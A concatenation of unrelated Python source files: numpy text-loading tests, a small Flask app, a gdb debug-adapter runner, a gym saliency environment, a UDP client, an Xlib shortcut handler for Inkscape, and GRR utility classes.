test = np.ndfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), **kwargs)
def test_names_auto_completion(self):
"Make sure that names are properly completed"
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
"Make sure we pick up the right names w/ usecols"
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
"Test fix-width w/ names"
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
"Test missing values"
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values=-999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b'testNonetherestofthedata')
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b' testNonetherestofthedata')
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,3')
dtype = [('a', np.int), ('b', np.float)]
test = np.recfromcsv(data, missing_values='N/A', dtype=dtype)
control = np.array([(0, 1), (2, 3)],
dtype=dtype)
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file object
wanted = np.arange(6).reshape((2, 3))
if sys.version_info[0] >= 3:
# python 3k is known to fail for '\r'
linesep = ('\n', '\r\n')
else:
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
f, name = mkstemp()
# We can't use NamedTemporaryFile on windows, because we cannot
# reopen the file.
try:
os.write(f, asbytes(data))
assert_array_equal(np.genfromtxt(name), wanted)
finally:
os.close(f)
os.unlink(name)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokeness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
gc.collect()
n_before = len(gc.get_objects())
np.load(f)
n_after = len(gc.get_objects())
assert_equal(n_before, n_after)
if __name__ == "__main__":
run_module_suite()
|
app.py
|
from flask import Flask, render_template, send_from_directory, request, send_file
import os
from threading import Thread
from os import path
from werkzeug.datastructures import MultiDict
from werkzeug.utils import redirect, secure_filename
from Facebook import madangowri
app = Flask(__name__)
file_path_main = path.abspath(__file__)
dir_path_main = path.dirname(file_path_main)
@app.route('/')
def hello():
return 'Home Page'
@app.route("/facebook/permlove")
def dontbecorner():
thread_b = Thread(target=madangowri.Run, args=())
thread_b.start()
return render_template("timepage.html", title="perm Love")
if __name__ == '__main__':
# Bind to PORT if defined, otherwise default to 5000.
port = int(os.environ.get('PORT', 5000))
app.run(host='0.0.0.0', port=port)
|
run.py
|
import sys
from threading import Thread
from queue import Queue
from gdb_dap.reader import reader_thread
from gdb_dap.writer import writer_thread
from gdb_dap.gdb_dap import json_process
if __name__ == "__main__":
thread = None
reader = None
writer = None
read_from = sys.stdin.buffer
write_to = sys.stdout.buffer
# read_from = open('./cmds.txt', 'rb')
q_read = Queue()
q_write = Queue()
reader = Thread(target=reader_thread, args=(read_from, q_read))
writer = Thread(target=writer_thread, args=(write_to, q_write))
thread = Thread(target=json_process, args=(q_read, q_write))
if thread:
thread.start()
writer.start()
reader.start()
if thread:
thread.join()
writer.join()
reader.join()
|
gym_environment.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from multiprocessing import Process, Pipe
import numpy as np
import cv2
import gym
from environment import environment
from sam.spectral_residual_saliency import SpectralResidualSaliency
COMMAND_RESET = 0
COMMAND_ACTION = 1
COMMAND_TERMINATE = 2
GlobalImageId = 0
def preprocess_frame(observation):
# observation shape = (210, 160, 3)
observation = observation.astype(np.float32)
resized_observation = cv2.resize(observation, (84, 84))
resized_observation = resized_observation / 255.0
return resized_observation
def mysaliency_on_frame_colormap(saliency, frame):
height, width, _ = frame.shape
saliency_new = np.broadcast_to(np.expand_dims(saliency, 2), (saliency.shape[0],saliency.shape[1],3))
heatmap = cv2.applyColorMap(saliency_new, cv2.COLORMAP_JET)
result = heatmap * 0.4 + frame * 0.5
return result.astype('uint8')
def spectralsaliency(inputimage):
srs = SpectralResidualSaliency(inputimage)
map = srs.get_saliency_map()
return map
def spectralsaliency_for_colormap(inputimage):
srs = SpectralResidualSaliency(inputimage)
map = srs.get_saliency_map()
map = map * 255
return map.astype('uint8')
def preprocess_frame_with_attention(image):
#global GlobalImageId
#GlobalImageId += 1
image_salmap = spectralsaliency_for_colormap(image) #spectral saliency
image_with_attention = mysaliency_on_frame_colormap(image_salmap, image) # heatmap
#outname = 'S' + str(GlobalImageId)
#cv2.imwrite('/home/ml/kkheta2/lab/unrealwithattention/attentionframes/MZuma/' + '%s' % outname + '.png', image_with_attention)
image_with_attention = image_with_attention.astype(np.float32)
image_with_attention = image_with_attention / 255.0
image_with_attention = cv2.resize(image_with_attention, (84, 84)) # reverting back to 84*84 for baseline code
return image_with_attention
def worker(conn, env_name):
env = gym.make(env_name)
env.reset()
conn.send(0)
while True:
command, arg = conn.recv()
if command == COMMAND_RESET:
obs = env.reset()
#state = preprocess_frame(obs)
state = preprocess_frame_with_attention(obs)
conn.send(state)
elif command == COMMAND_ACTION:
reward = 0
for i in range(4):
obs, r, terminal, _ = env.step(arg)
reward += r
if terminal:
break
#state = preprocess_frame(obs)
state = preprocess_frame_with_attention(obs)
conn.send([state, reward, terminal])
elif command == COMMAND_TERMINATE:
break
else:
print("bad command: {}".format(command))
env.close()
conn.send(0)
conn.close()
class GymEnvironment(environment.Environment):
@staticmethod
def get_action_size(env_name):
env = gym.make(env_name)
action_size = env.action_space.n
env.close()
return action_size
def __init__(self, env_name):
environment.Environment.__init__(self)
self.conn, child_conn = Pipe()
self.proc = Process(target=worker, args=(child_conn, env_name))
self.proc.start()
self.conn.recv()
self.reset()
def reset(self):
self.conn.send([COMMAND_RESET, 0])
self.last_state = self.conn.recv()
self.last_action = 0
self.last_reward = 0
def stop(self):
self.conn.send([COMMAND_TERMINATE, 0])
ret = self.conn.recv()
self.conn.close()
self.proc.join()
print("gym environment stopped")
def process(self, action):
self.conn.send([COMMAND_ACTION, action])
state, reward, terminal = self.conn.recv()
pixel_change = self._calc_pixel_change(state, self.last_state)
self.last_state = state
self.last_action = action
self.last_reward = reward
return state, reward, terminal, pixel_change
def process_with_attention(self, action):
self.conn.send([COMMAND_ACTION, action])
state, reward, terminal = self.conn.recv()
pixel_change = self._calc_pixel_change(state, self.last_state)
self.last_state = state
self.last_action = action
self.last_reward = reward
return state, reward, terminal, pixel_change
|
nets_udp_client.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import time
import threading
from socket import *
class UdpClient(object):
def __init__(self, host='127.0.0.1', port=6001):
self.Host = host
self.Port = port
self.BufSize = 4096
self.Addr = (self.Host, self.Port)
self.Socket = socket(AF_INET, SOCK_DGRAM)
def start(self):
try:
print('Start Udp Client')
print('(Press Ctrl + Break to exit abort...)')
t = threading.Thread(target=self.recv)
t.setDaemon(True)
t.start()
while True:
data = input()
if not data:
break
self.Socket.sendto(data.encode('utf-8'), self.Addr)
print('[{}:{}] {}'.format(self.Addr[0], self.Addr[1], time.strftime(
'%Y-%m-%d %H:%M:%S', time.localtime(time.time()))))
print('Local->Remote:{}'.format(data))
except Exception as e:
print('Error send messages:', e)
finally:
self.Socket.close()
def stop(self):
self.Socket.close()
print('Stop Udp Client')
def recv(self):
self.Socket.sendto('hello'.encode('utf-8'), self.Addr)
while True:
data, addr = self.Socket.recvfrom(self.BufSize)
if not data:
break
print('[{}:{}] {}'.format(addr[0], str(addr[1]), time.strftime(
'%Y-%m-%d %H:%M:%S', time.localtime(time.time()))))
print('Remote->Client:{}'.format(data.decode('utf-8')))
def start_udp_client(host, port):
c = UdpClient(host=host, port=port)
c.start()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'-i', '--ip', help='ip address: ipv4 address witch tcp server listen, such as \'127.0.0.1\'', type=str, default='127.0.0.1')
parser.add_argument(
'-p', '--port', help='port: port number witch tcp server listen, such as \'6001\'', type=int, default=6001)
args = parser.parse_args()
start_udp_client(host=args.ip, port=args.port)
|
main.py
|
import threading
import Xlib
from Xlib.display import Display
from Xlib import X, XK
from Xlib.protocol import event
from normal import normal_mode
class Manager():
def __init__(self, inkscape_id):
self.id = inkscape_id
self.disp = Display()
self.screen = self.disp.screen()
self.root = self.screen.root
self.inkscape = self.disp.create_resource_object('window', inkscape_id)
self.mode = normal_mode
def event(self, name, detail, state):
return name(
time=X.CurrentTime,
root=self.root,
window=self.inkscape,
same_screen=0, child=Xlib.X.NONE,
root_x=0, root_y=0, event_x=0, event_y=0,
state=state,
detail=detail
)
def string_to_keycode(self, key):
keysym = XK.string_to_keysym(key)
keycode = self.disp.keysym_to_keycode(keysym)
return keycode
def press(self, key, mask=X.NONE):
keycode = self.string_to_keycode(key)
self.inkscape.send_event(self.event(event.KeyPress, keycode, mask), propagate=True)
self.inkscape.send_event(self.event(event.KeyRelease, keycode, mask), propagate=True)
self.disp.flush()
self.disp.sync()
def grab(self):
self.inkscape.grab_key(X.AnyKey, X.AnyModifier, True, X.GrabModeAsync, X.GrabModeAsync)
# Ungrab window manager shortcuts (Super + ...)
self.inkscape.ungrab_key(self.string_to_keycode('Super_L'), X.AnyModifier, True)
self.inkscape.ungrab_key(self.string_to_keycode('Alt_L'), X.AnyModifier, True)
self.inkscape.ungrab_key(self.string_to_keycode('Alt_R'), X.AnyModifier, True)
self.inkscape.ungrab_key(self.string_to_keycode('Shift_L'), X.AnyModifier, True)
self.inkscape.ungrab_key(self.string_to_keycode('Shift_R'), X.AnyModifier, True)
self.inkscape.change_attributes(event_mask=X.KeyReleaseMask | X.KeyPressMask | X.StructureNotifyMask)
def ungrab(self):
self.inkscape.ungrab_key(X.AnyKey, X.AnyModifier, True)
def listen(self):
self.grab()
while True:
evt = self.disp.next_event()
if evt.type in [X.KeyPress, X.KeyRelease]:
keycode = evt.detail
keysym = self.disp.keycode_to_keysym(keycode, 0)
char = XK.keysym_to_string(keysym)
self.disp.allow_events(X.ReplayKeyboard, X.CurrentTime)
self.mode(self, evt, char)
if evt.type == X.DestroyNotify:
if evt.window.id == self.id:
self.ungrab()
return
def create(inkscape_id):
m = Manager(inkscape_id)
m.listen()
def is_inkscape(window):
return (window.get_wm_class() and 'inkscape' in window.get_wm_class()[0])
def main():
disp = Display()
screen = disp.screen()
root = screen.root
# First listen for existing windows
for window in root.query_tree().children:
if is_inkscape(window):
print('Found existing window')
listen = threading.Thread(target=create, args=[window.id])
listen.start()
# New windows
root.change_attributes(event_mask=X.SubstructureNotifyMask)
while True:
evt = disp.next_event()
if evt.type == X.CreateNotify:
window = evt.window
try:
if is_inkscape(window):
print('New window!')
listen = threading.Thread(target=create, args=[window.id])
listen.start()
except Xlib.error.BadWindow:
pass
if __name__ == '__main__':
main()
|
utils.py
|
#!/usr/bin/env python
"""This file contains various utility classes used by GRR."""
import array
import base64
import copy
import cStringIO
import errno
import functools
import getpass
import os
import pipes
import platform
import Queue
import random
import re
import shutil
import socket
import stat
import struct
import tarfile
import tempfile
import threading
import time
import weakref
import zipfile
import zlib
class Error(Exception):
pass
def Proxy(f):
"""A helper to create a proxy method in a class."""
def Wrapped(self, *args):
return getattr(self, f)(*args)
return Wrapped
class TempDirectory(object):
"""A self cleaning temporary directory.
Do not use this function for any client related temporary files! Use
the functionality provided by client_actions/tempfiles.py instead.
"""
def __enter__(self):
self.name = tempfile.mkdtemp()
return self.name
def __exit__(self, exc_type, exc_value, traceback):
shutil.rmtree(self.name, True)
# This is a synchronize decorator.
def Synchronized(f):
"""Synchronization decorator."""
@functools.wraps(f)
def NewFunction(self, *args, **kw):
with self.lock:
return f(self, *args, **kw)
return NewFunction
class InterruptableThread(threading.Thread):
"""A class which exits once the main thread exits."""
def __init__(self,
target=None,
args=None,
kwargs=None,
sleep_time=10,
name=None,
**kw):
self.exit = False
self.last_run = 0
self.target = target
self.args = args or ()
self.kwargs = kwargs or {}
self.sleep_time = sleep_time
if name is None:
raise ValueError("Please name your threads.")
super(InterruptableThread, self).__init__(name=name, **kw)
# Do not hold up program exit
self.daemon = True
def Iterate(self):
"""This will be repeatedly called between sleeps."""
def Stop(self):
self.exit = True
def run(self):
# When the main thread exits, the time module might disappear and be already
# None. We take a local reference to the functions we need.
sleep = time.sleep
now = time.time
while not self.exit:
if self.target:
self.target(*self.args, **self.kwargs)
else:
self.Iterate()
# Implement interruptible sleep here.
self.last_run = now()
# Exit if the main thread disappears.
while (time and not self.exit and
now() < self.last_run + self.sleep_time):
sleep(1)
class Node(object):
"""An entry to a linked list."""
next = None
prev = None
data = None
def __init__(self, key, data):
self.data = data
self.key = key
def __str__(self):
return "Node %s: %s" % (self.key, SmartStr(self.data))
def __repr__(self):
return SmartStr(self)
class LinkedList(object):
"""A simple doubly linked list used for fast caches."""
def __init__(self):
# We are the head node.
self.next = self.prev = self
self.size = 0
def AppendNode(self, node):
self.size += 1
last_node = self.prev
last_node.next = node
node.prev = last_node
node.next = self
self.prev = node
def PopLeft(self):
"""Returns the head node and removes it from the list."""
if self.next is self:
raise IndexError("Pop from empty list.")
first_node = self.next
self.Unlink(first_node)
return first_node
def Pop(self):
"""Returns the tail node and removes it from the list."""
if self.prev is self:
raise IndexError("Pop from empty list.")
last_node = self.prev
self.Unlink(last_node)
return last_node
def Unlink(self, node):
"""Removes a given node from the list."""
self.size -= 1
node.prev.next = node.next
node.next.prev = node.prev
node.next = node.prev = None
def __iter__(self):
p = self.next
while p is not self:
yield p
p = p.next
def __len__(self):
return self.size
def __str__(self):
p = self.next
s = []
while p is not self:
s.append(str(p.data))
p = p.next
return "[" + ", ".join(s) + "]"
def Print(self):
p = self.next
while p is not self:
print "%s: prev %r next %r\n" % (p.data, p.prev, p.next)
p = p.next
class FastStore(object):
"""This is a cache which expires objects in oldest first manner.
This implementation first appeared in PyFlag.
"""
def __init__(self, max_size=10):
"""Constructor.
Args:
max_size: The maximum number of objects held in cache.
"""
# This class implements a LRU cache which needs fast updates of the LRU
# order for random elements. This is usually implemented by using a
# dict for fast lookups and a linked list for quick deletions / insertions.
self._age = LinkedList()
self._hash = {}
self._limit = max_size
self.lock = threading.RLock()
def KillObject(self, obj):
"""Perform cleanup on objects when they expire.
Should be overridden by classes which need to perform special cleanup.
Args:
obj: The object which was stored in the cache and is now expired.
"""
@Synchronized
def __iter__(self):
return iter([(key, n.data) for key, n in self._hash.iteritems()])
@Synchronized
def Expire(self):
"""Expires old cache entries."""
while len(self._age) > self._limit:
node = self._age.PopLeft()
self._hash.pop(node.key, None)
self.KillObject(node.data)
@Synchronized
def Put(self, key, obj):
"""Add the object to the cache."""
# Remove the old entry if it is there.
node = self._hash.pop(key, None)
if node:
self._age.Unlink(node)
# Make a new node and insert it.
node = Node(key=key, data=obj)
self._hash[key] = node
self._age.AppendNode(node)
self.Expire()
return key
@Synchronized
def ExpireObject(self, key):
"""Expire a specific object from cache."""
node = self._hash.pop(key, None)
if node:
self._age.Unlink(node)
self.KillObject(node.data)
return node.data
@Synchronized
def ExpireRegEx(self, regex):
"""Expire all the objects with the key matching the regex."""
reg = re.compile(regex)
for key in list(self._hash):
if reg.match(key):
self.ExpireObject(key)
@Synchronized
def ExpirePrefix(self, prefix):
"""Expire all the objects with the key having a given prefix."""
for key in list(self._hash):
if key.startswith(prefix):
self.ExpireObject(key)
@Synchronized
def Pop(self, key):
"""Remove the object from the cache completely."""
node = self._hash.get(key)
if node:
del self._hash[key]
self._age.Unlink(node)
return node.data
@Synchronized
def Get(self, key):
"""Fetch the object from cache.
Objects may be flushed from cache at any time. Callers must always
handle the possibility of KeyError raised here.
Args:
key: The key used to access the object.
Returns:
Cached object.
Raises:
KeyError: If the object is not present in the cache.
"""
if key not in self._hash:
raise KeyError(key)
node = self._hash[key]
self._age.Unlink(node)
self._age.AppendNode(node)
return node.data
@Synchronized
def __contains__(self, obj):
return obj in self._hash
@Synchronized
def __getitem__(self, key):
return self.Get(key)
@Synchronized
def Flush(self):
"""Flush all items from cache."""
while self._age:
node = self._age.PopLeft()
self.KillObject(node.data)
self._hash = dict()
def __len__(self):
return len(self._hash)
class TimeBasedCache(FastStore):
"""A Cache which expires based on time."""
active_caches = None
house_keeper_thread = None
def __init__(self, max_size=10, max_age=600):
"""Constructor.
This cache will refresh the age of the cached object as long as they are
accessed within the allowed age. The age refers to the time since it was
last touched.
Args:
max_size: The maximum number of objects held in cache.
max_age: The maximum length of time an object is considered alive.
"""
super(TimeBasedCache, self).__init__(max_size)
self.max_age = max_age
def HouseKeeper():
"""A housekeeper thread which expunges old objects."""
if not time:
# This might happen when the main thread exits, we don't want to raise.
return
now = time.time()
for cache in TimeBasedCache.active_caches:
# Only expunge while holding the lock on the data store.
with cache.lock:
# pylint: disable=protected-access
# We need to take a copy of the value list because we are changing
# this dict during the iteration.
for node in cache._hash.values():
timestamp, obj = node.data
# Expire the object if it is too old.
if timestamp + cache.max_age < now:
cache.KillObject(obj)
cache._age.Unlink(node)
cache._hash.pop(node.key, None)
# pylint: enable=protected-access
if not TimeBasedCache.house_keeper_thread:
TimeBasedCache.active_caches = weakref.WeakSet()
# This thread is designed to never finish.
TimeBasedCache.house_keeper_thread = InterruptableThread(
name="HouseKeeperThread", target=HouseKeeper)
TimeBasedCache.house_keeper_thread.start()
TimeBasedCache.active_caches.add(self)
@Synchronized
def Get(self, key):
now = time.time()
stored = super(TimeBasedCache, self).Get(key)
if stored[0] + self.max_age < now:
raise KeyError("Expired")
# This updates the timestamp in place to keep the object alive
stored[0] = now
return stored[1]
def Put(self, key, obj):
super(TimeBasedCache, self).Put(key, [time.time(), obj])
class Memoize(object):
"""A decorator to produce a memoizing version of a method."""
def __init__(self, deep_copy=False):
"""Constructor.
Args:
deep_copy: Whether to perform a deep copy of the returned object.
Otherwise, a direct reference is returned.
"""
self.deep_copy = deep_copy
def __call__(self, f):
"""Produce a memoizing version of f.
Requires that all parameters are hashable. Also, it does not copy the return
value, so changes to a returned object may be visible in future invocations.
Args:
f: The function which will be wrapped.
Returns:
A wrapped function which memoizes all values returned by f, keyed by
the arguments to f.
"""
f.memo_pad = {}
f.memo_deep_copy = self.deep_copy
@functools.wraps(f)
def Wrapped(self, *args, **kwargs):
# We keep args and kwargs separate to avoid confusing an arg which is a
# pair with a kwarg. Also, we don't try to match calls when an argument
# moves between args and kwargs.
key = tuple(args), tuple(sorted(kwargs.items(), key=lambda x: x[0]))
if key not in f.memo_pad:
f.memo_pad[key] = f(self, *args, **kwargs)
if f.memo_deep_copy:
return copy.deepcopy(f.memo_pad[key])
else:
return f.memo_pad[key]
return Wrapped
class MemoizeFunction(object):
"""A decorator to produce a memoizing version a function.
"""
def __init__(self, deep_copy=False):
"""Constructor.
Args:
deep_copy: Whether to perform a deep copy of the returned object.
Otherwise, a direct reference is returned.
"""
self.deep_copy = deep_copy
def __call__(self, f):
"""Produce a memoizing version of f.
Requires that all parameters are hashable. Also, it does not copy the return
value, so changes to a returned object may be visible in future invocations.
Args:
f: The function which will be wrapped.
Returns:
A wrapped function which memoizes all values returned by f, keyed by
the arguments to f.
"""
f.memo_pad = {}
f.memo_deep_copy = self.deep_copy
@functools.wraps(f)
def Wrapped(*args, **kwargs):
key = tuple(args), tuple(sorted(kwargs.items(), key=lambda x: x[0]))
if key not in f.memo_pad:
f.memo_pad[key] = f(*args, **kwargs)
if f.memo_deep_copy:
return copy.deepcopy(f.memo_pad[key])
else:
return f.memo_pad[key]
return Wrapped
class AgeBasedCache(TimeBasedCache):
"""A cache which holds objects for a maximum length of time.
This differs from the TimeBasedCache which keeps the objects alive as long as
they are accessed.
"""
@Synchronized
def Get(self, key):
now = time.time()
stored = FastStore.Get(self, key)
if stored[0] + self.max_age < now:
raise KeyError("Expired")
return stored[1]
class Struct(object):
"""A baseclass for parsing binary Structs."""
# Derived classes must initialize this into an array of (format,
# name) tuples.
_fields = None
def __init__(self, data):
"""Parses ourselves from data."""
format_str = "".join([x[0] for x in self._fields])
self.size = struct.calcsize(format_str)
try:
parsed_data = struct.unpack(format_str, data[:self.size])
except struct.error:
raise RuntimeError("Unable to parse")
for i in range(len(self._fields)):
setattr(self, self._fields[i][1], parsed_data[i])
def __repr__(self):
"""Produce useful text representation of the Struct."""
dat = []
for _, name in self._fields:
dat.append("%s=%s" % (name, getattr(self, name)))
return "%s(%s)" % (self.__class__.__name__, ", ".join(dat))
@classmethod
def GetSize(cls):
"""Calculate the size of the struct."""
format_str = "".join([x[0] for x in cls._fields])
return struct.calcsize(format_str)
def GroupBy(items, key):
"""A generator that groups all items by a key.
Args:
items: A list of items or a single item.
key: A function which given each item will return the key.
Returns:
A dict with keys being each unique key and values being a list of items of
that key.
"""
key_map = {}
# Make sure we are given a sequence of items here.
try:
item_iter = iter(items)
except TypeError:
item_iter = [items]
for item in item_iter:
key_id = key(item)
key_map.setdefault(key_id, []).append(item)
return key_map
def SmartStr(string):
"""Returns a string or encodes a unicode object.
This function essentially will always return an encoded string. It should be
used on an interface to the system which must accept a string and not unicode.
Args:
string: The string to convert.
Returns:
an encoded string.
"""
if type(string) == unicode: # pylint: disable=unidiomatic-typecheck
return string.encode("utf8", "ignore")
return str(string)
def SmartUnicode(string):
"""Returns a unicode object.
This function will always return a unicode object. It should be used to
guarantee that something is always a unicode object.
Args:
string: The string to convert.
Returns:
a unicode object.
"""
if type(string) != unicode: # pylint: disable=unidiomatic-typecheck
try:
return string.__unicode__()
except (AttributeError, UnicodeError):
return str(string).decode("utf8", "ignore")
return string
def Xor(string, key):
"""Returns a string where each character has been xored with key."""
return "".join([chr(c ^ key) for c in bytearray(string)])
def XorByteArray(arr, key):
"""Xors every item in the array with key and returns it."""
for i in xrange(len(arr)):
arr[i] ^= key
return arr
def FormatAsHexString(num, width=None, prefix="0x"):
"""Takes an int and returns the number formatted as a hex string."""
# Strip "0x".
hex_str = hex(num)[2:]
# Strip "L" for long values.
hex_str = hex_str.replace("L", "")
if width:
hex_str = hex_str.rjust(width, "0")
return "%s%s" % (prefix, hex_str)
def FormatAsTimestamp(timestamp):
if not timestamp:
return "-"
return time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(timestamp))
def NormalizePath(path, sep="/"):
"""A sane implementation of os.path.normpath.
The standard implementation treats leading / and // as different leading to
incorrect normal forms.
NOTE: Its ok to use a relative path here (without leading /) but any /../ will
still be removed anchoring the path at the top level (e.g. foo/../../../../bar
=> bar).
Args:
path: The path to normalize.
sep: Separator used.
Returns:
A normalized path. In this context normalized means that all input paths
that would result in the system opening the same physical file will produce
the same normalized path.
"""
if not path:
return sep
path = SmartUnicode(path)
path_list = path.split(sep)
# This is a relative path and the first element is . or ..
if path_list[0] in [".", "..", ""]:
path_list.pop(0)
# Deliberately begin at index 1 to preserve a single leading /
i = 0
while True:
list_len = len(path_list)
# We begin at the last known good position so we never iterate over path
# elements which are already examined
for i in range(i, len(path_list)):
# Remove /./ form
if path_list[i] == "." or not path_list[i]:
path_list.pop(i)
break
# Remove /../ form
elif path_list[i] == "..":
path_list.pop(i)
# Anchor at the top level
if (i == 1 and path_list[0]) or i > 1:
i -= 1
path_list.pop(i)
break
# If we didnt alter the path so far we can quit
if len(path_list) == list_len:
return sep + sep.join(path_list)
def JoinPath(stem="", *parts):
"""A sane version of os.path.join.
The intention here is to append the stem to the path. The standard module
removes the path if the stem begins with a /.
Args:
stem: The stem to join to.
*parts: parts of the path to join. The first arg is always the root and
directory traversal is not allowed.
Returns:
a normalized path.
"""
# Ensure all path components are unicode
parts = [SmartUnicode(path) for path in parts]
result = (stem + NormalizePath(u"/".join(parts))).replace("//", "/")
result = result.rstrip("/")
return result or "/"
def ShellQuote(value):
"""Escapes the string for the safe use inside shell command line."""
# TODO(user): replace pipes.quote with shlex.quote when time comes.
return pipes.quote(SmartUnicode(value))
def Join(*parts):
"""Join (AFF4) paths without normalizing.
A quick join method that can be used to express the precondition that
the parts are already normalized.
Args:
*parts: The parts to join
Returns:
The joined path.
"""
return "/".join(parts)
def Grouper(iterable, n):
"""Group iterable into lists of size n. Last list will be short."""
items = []
for count, item in enumerate(iterable):
items.append(item)
if (count + 1) % n == 0:
yield items
items = []
if items:
yield items
def EncodeReasonString(reason):
return base64.urlsafe_b64encode(SmartStr(reason))
def DecodeReasonString(reason):
return SmartUnicode(base64.urlsafe_b64decode(SmartStr(reason)))
# Regex chars that should not be in a regex
disallowed_chars = re.compile(r"[[\](){}+*?.$^\\]")
def EscapeRegex(string):
return re.sub(disallowed_chars, lambda x: "\\" + x.group(0),
SmartUnicode(string))
def GeneratePassphrase(length=20):
"""Create a 20 char passphrase with easily typeable chars."""
valid_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
valid_chars += "0123456789 ,-_&$#"
return "".join(random.choice(valid_chars) for i in range(length))
def PassphraseCallback(verify=False,
prompt1="Enter passphrase:",
